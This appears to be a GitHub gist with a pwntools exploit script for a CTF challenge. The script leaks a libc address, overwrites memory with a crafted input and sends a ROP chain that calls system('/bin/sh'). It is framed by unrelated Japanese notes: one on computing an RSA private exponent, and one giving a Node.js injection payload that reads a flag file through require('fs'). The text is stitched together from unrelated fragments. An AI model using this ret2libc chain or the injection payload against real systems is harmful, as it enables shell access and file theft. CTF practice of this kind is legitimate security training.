$ed - 1 = k(p-1)(q-1)$ になるはずなので、d は `pow(e, -1, (p-1)*(q-1))` で計算できる(3 引数 `pow` に負の指数を渡せるのは Python 3.8 以降。`e` と `(p-1)(q-1)` が互いに素であることが前提)
Last active
April 15, 2024 08:05
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
# Limit pwntools' own log output to errors.
context.log_level = 'error'

# Command-line options: where to connect, whether to echo received data,
# and whether to use the hard-coded external challenge endpoint.
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="127.0.0.1", help="target host")
# NOTE(review): no type=int is given, so a port passed on the command line
# arrives as a str while the default stays an int.
parser.add_argument("--port", default=3001, help="target port")
parser.add_argument('--log', action='store_true')
parser.add_argument('--is-gaibu', action='store_true')
args = parser.parse_args()

# NOTE(review): `from pwn import *` normally exports a logger named `log`;
# this assignment rebinds that name to a plain bool -- confirm nothing else
# in the script expects the logger.
log = args.log
# "gaibu" is presumably Japanese 外部 ("external"): the public challenge host.
is_gaibu = args.is_gaibu

# The external flag overrides --host/--port with the fixed endpoint.
host, port = (
    ("challenge.ctf.hakatashi.com", 27777)
    if is_gaibu
    else (args.host, args.port)
)
def wait_for_attach():
    """Pause for a key press so a debugger can be attached.

    Does nothing when the script runs against the external host
    (``is_gaibu`` set).
    """
    if is_gaibu:
        return
    print('attach?')
    # NOTE(review): raw_input is the Python 2 builtin. On Python 3 this name
    # has to come from somewhere else (confirm whether `from pwn import *`
    # provides it); otherwise this line raises NameError.
    raw_input()
def just_u64(x):
    """Right-pad ``x`` with NUL bytes to 8 bytes and unpack it with ``u64``."""
    padded = x.ljust(8, b'\x00')
    return u64(padded)
# Open the connection to the selected host/port. Every I/O helper in this
# script reads from and writes to this module-level object.
r = remote(host, port)
def recvuntil(x, verbose=True):
    """Read from the connection until ``x`` is seen and return the data.

    The data is echoed when both the global ``log`` flag and ``verbose``
    are truthy.

    NOTE: the return value goes through ``bytes.strip(x)``, which treats
    ``x`` as a set of byte values and trims them from *both* ends; it does
    not remove ``x`` as a trailing delimiter.
    """
    data = r.recvuntil(x)
    if verbose and log:
        print(data)
    return data.strip(x)
def recv(n, verbose=True):
    """Receive via ``r.recv(n)`` and return the data unchanged.

    The data is echoed when both the global ``log`` flag and ``verbose``
    are truthy.
    """
    chunk = r.recv(n)
    if verbose and log:
        print(chunk)
    return chunk
def recvline(verbose=True):
    """Receive one line and return it with newline bytes stripped from both ends.

    The raw line is echoed when both the global ``log`` flag and ``verbose``
    are truthy.
    """
    line = r.recvline()
    if verbose and log:
        print(line)
    return line.strip(b'\n')
def sendline(s, verbose=True):
    """Send ``s`` through ``r.sendline``.

    ``verbose`` is accepted for symmetry with the receive helpers, but the
    echo of outgoing lines is disabled (the original ``print`` was commented
    out), so the flag has no effect here.
    """
    r.sendline(s)
def send(s, verbose=True):
    """Send ``s`` through ``r.send``.

    The outgoing data is echoed (without a newline) when both the global
    ``log`` flag and ``verbose`` are truthy.
    """
    if verbose and log:
        print(s, end='')
    r.send(s)
def interactive():
    """Hand the open connection over to the terminal via ``r.interactive()``."""
    r.interactive()
#################################### | |
def menu(choice):
    """Wait for a ``:`` prompt, then answer it with ``str(choice)``."""
    recvuntil(b':')
    answer = str(choice)
    sendline(answer)
def rs(s, new_line=True, r=b':'):
    """Receive, then send: wait for delimiter ``r`` and reply with ``str(s)``.

    ``new_line`` selects ``sendline`` (default) or ``send``. The parameter
    ``r`` shadows the module-level connection object inside this function;
    here it is only the delimiter passed to ``recvuntil``.
    """
    recvuntil(r)
    text = str(s)
    emit = sendline if new_line else send
    emit(text)
# The service prints a line "System() Address is <hex>"; that disclosed
# address is parsed here and is what makes the libc base computable.
recvuntil(b"System() Address is ")
system_addr = int(recvline(), 16)

# Offsets in order: system, pop_rdi, "/bin/sh" string, nazo.
# They are hard-coded, so they match one specific libc build only.
# The external and local sets are identical in this version of the script;
# presumably the split exists so a differing local libc can get its own values.
remote_offsets = (0x50d70, 0x2a3e5, 0x1d8678, 0x21c000)
local_offsets = (0x50d70, 0x2a3e5, 0x1d8678, 0x21c000)
system_off, pop_rdi_off, binsh_off, nazo_off = (
    remote_offsets if is_gaibu else local_offsets
)

libc_base = system_addr - system_off
pop_rdi = libc_base + pop_rdi_off
# One byte past pop_rdi; presumably the trailing `ret` of that gadget.
ret_addr = pop_rdi + 1
binsh_addr = libc_base + binsh_off
# "nazo" is presumably Japanese 謎 ("mystery"); what lives at this offset
# is not stated anywhere in the script.
nazo_addr = libc_base + nazo_off
# Alternative value left by the author:
#nazo_addr = libc_base + 0x24b748
# Earlier attempt left by the author:
#canary = b"A" * (0x29758 + 8)
target = 0x29748
x = 0x8
# First input: (target - x) zero bytes, then one libc-relative pointer,
# then four zero qwords.
# NOTE(review): the variable name suggests the stack-protector canary is the
# value being replaced; the script itself does not show what sits at this
# offset in the target process. The target evidently accepts an input of
# this length at its first ">" prompt.
canary = b"".join([b"\x00" * (target - x), p64(nazo_addr), p64(0) * 4])
recvuntil(b">")
sendline(canary)
# Four 64-bit words, packed little-endian with p64 in this order:
# pop_rdi, address of the "/bin/sh" string, ret_addr, system_addr.
chain = (pop_rdi, binsh_addr, ret_addr, system_addr)
payload = b''.join(p64(word) for word in chain)

wait_for_attach()
recvuntil(b">")
# Second input: seven zero qwords of padding ("gomi" is presumably Japanese
# ゴミ, "junk") followed by the packed words above.
#sendline(payload)
gomi = p64(0) * 7
sendline(gomi + payload)

# Keep the connection open and attach it to the terminal.
interactive()
`process.mainModule.require('fs').readFileSync('flag')` を name、role を `x` に設定したオブジェクト `{"name": ..., "role": "x"}` を id として渡すと、`${id}.name` や `${id}.role` がいい感じになり、フラグが読める